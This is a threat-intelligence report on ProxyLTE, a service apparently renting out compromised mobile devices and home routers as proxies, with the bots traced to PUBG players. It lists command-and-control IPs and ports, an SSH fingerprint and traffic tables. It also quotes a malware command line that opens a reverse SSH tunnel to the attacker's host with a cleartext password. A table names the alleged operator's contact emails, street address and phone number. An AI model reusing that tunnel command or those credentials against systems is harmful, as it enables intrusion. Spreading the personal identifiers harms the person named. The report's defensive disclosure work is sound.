X-Industry

Summary

ProxyLTE, a supplier of US based mobile and home router proxies, has been identified as one component in a large-scale fraud, targeting a Wapack Labs’ client. ProxyLTE.com was created in late 2017, however associated malware was first observed in 2013. This report includes details on ProxyLTE malware and associated infrastructure. 

Background

Beginning in 2018, Wapack Labs began tracking botnet activity affecting a client. As part of this analysis, we profiled the traffic to identify command and control (C2) channels. A common thread among the botnet communications was a popular mobile game – Player Unknown Battleground (PUBG). Additional analysis revealed that many of the bots linked to PUBG were subsequently rented out by ProxyLTE. This connection indicates a larger supply chain of compromised mobile devices originating from PUBG gamers with ProxyLTE operating as a major reseller.

Details

ProxyLTE.com was first registered in October of 2017 and has since advertised on several hacking sites on both the surface and dark webs, as well as in IRC chatrooms frequented by hackers. Bot the mobile device and the home router proxies are offered for as little as $9 per day.

Figure 1: ProxyLTE Advertising   

Figure 2: ProxyLTE Home Page

 

Wapack Labs obtained 46 mobile proxies from ProxyLTE as part of a trial. Our analysis revealed that over half of the proxies had made connections to Tencent’s PUBG chat endpoint at 49.51.42.110 within a 24 hour period, indicating the proxies were originally sourced from PUBG gamers.  Additionally a total of 11  C2s were identified, all hosted by German hosting company Hetzner Online. All compromised proxies were either managed on ports 3665,3666, or 4996. Additional traffic was observed on 18080, which is the default port used for Monero cryptocurrency mining.

C2 Servers

Port(s)

ASN

159.69.148.118

3665-3666

Hetzner Online GmbH

159.69.148.13

3665-3666

Hetzner Online GmbH

94.130.181.218

3665-3666

Hetzner Online GmbH

159.69.215.125

3665-3666

Hetzner Online GmbH

159.69.210.24

3665-3666

Hetzner Online GmbH

159.69.12.225

3665-3666

Hetzner Online GmbH

159.69.0.162

3665-3666

Hetzner Online GmbH

195.201.252.238

3665-3666

Hetzner Online GmbH

159.69.213.194

3665-3666

Hetzner Online GmbH

95.216.179.82

3665-3666

Hetzner Online GmbH

136.243.64.95

4996

Hetzner Online GmbH

 

Figure 3: Proxies obtained from ProxyLTE

The primary proxy endpoint provided in the ProxyLTE trial was 54.38.228.38, as shown in Figure 2. Passive DNS on this IP showed a record for infused.soxx.us. The soxx.us domain exposed a much larger infrastructure linked by soxx.us subdomains as well as the following SSH fingerprint

1a:04:f8:62:ab:0b:f8:18:5d:7e:26:a5:24:0a:c9:16

This additional infrastructure consists of over one hundred related domains and IPs. These domains and IPs were listed as C2 nodes in a number of malware specimens dating back to 2013. This included Windows executables and Android APKs, many of which appeared to be voice message applications, for example, “Craigslist-Voice-Message.exe” and “VoiceApp.apk.”

A recent malware sample revealed poor operational security with a cleartext SSH password observable in Virus Total[1].

C:\Net.Framework4.5.9873289a789fa987fas8da7s8998d897asdfa98fas87fds8a7g9678g678sg678s6fsd7890h898d7h\System.exe" -ssh -R 14650:127.0.0.1:7908 soxx.us -l sox2 -pw 906090lol

 
The following table lists available profile data involving ProxyLTE.

Indicator

Desription

UIN 729425956

ICQ Instant Messaging contact address.

ProxyLTE@jabber.ru

Jabber contact Address.

@ProxyLTE

Telegram contact Address

soxxadm@gmail.com

Gmail contact address

Proxylte.com

Primary website

Proxylte.us

Secondary website – partially functioning

paurel2211@gmail.com

 

Registrant email for proxylte.us

Paul Aurel

 

Registrant name for proxylte.us

333 E 43rd StNew York  NY 10017

 

Registrant address for proxylte.us

+1.4843441009

 

Registrant phone number for proxylte.us

 

Conclusion

 ProxyLTE is part of a larger trend of growing mobile proxy botnets. Starting in mid-2018, Wapack Labs observed the use of mobile device proxies in various botnet activity and large-scale industrial fraud. A compromised mobile device offers several advantages for attackers. For one, malware removal on mobile devices is far less common and much more difficult than regular computers. This means an attacker can get more mileage out of a single mobile device. Second, mobile devices are more likely to change IP addresses making IP blacklisting an unrealistic defense strategy.

As of the date of this report, ProxyLTE is one of a few providers of compromised mobile device proxies. Mobile device proxy rental is currently a lucrative business model since a newly recruited mobile device has very little chance of being blocked - a feature many will pay top dollar for.  Wapack Labs also predicts the emergence of a ‘premium market’ of compromised mobile devices with the roll out of 5G as botnet herders can capitalize on the additional bandwidth.

 

Appendix A

The following table lists trending data on top IPs communicating with ProxyLTE IPs, with “COUNT” representing the number of proxies with which it was communicating.  The PUBG Tencent IP, 49.51.42.110, was seen communicating with more than half of the proxies.

IP

CC

COUNT

ASN

35.211.30.253

US

39

AS19527 Google LLC

35.211.120.82

US

32

AS19527 Google LLC

17.252.226.85

US

26

AS714 Apple Inc.

159.69.199.138

US

26

AS24940 Hetzner Online GmbH

209.58.147.67

US

25

AS394380 Leaseweb USA, Inc.

54.192.13.223

US

24

AS16509 Amazon.com, Inc.

54.192.13.179

US

24

AS16509 Amazon.com, Inc.

54.192.13.238

US

23

AS16509 Amazon.com, Inc.

54.192.13.110

US

22

AS16509 Amazon.com, Inc.

69.16.175.10

US

21

AS20446 Highwinds Network Group, Inc.

54.230.79.235

US

21

AS16509 Amazon.com, Inc.

49.51.42.110

CN

21

AS132203 Tencent Building, Kejizhongyi Avenue

35.227.238.95

US

21

AS15169 Google LLC

35.227.210.77

US

21

AS15169 Google LLC

205.185.216.42

US

21

AS20446 Highwinds Network Group, Inc.

205.185.216.10

US

21

AS20446 Highwinds Network Group, Inc.

35.241.16.93

US

20

AS15169 Google LLC

178.162.216.177

DE

20

AS28753 Leaseweb Deutschland GmbH

69.16.175.42

US

19

AS20446 Highwinds Network Group, Inc.

35.241.57.186

US

19

AS15169 Google LLC

 

[1]https://www.virustotal.com//#/file/976c29b5b7288d2901f0eba4cbae9bd9728e6e68f1b62112a438f74985017f94/behavior

E-mail me when people leave their comments –

You need to be a member of Red Sky Alliance to add comments!

Join Red Sky Alliance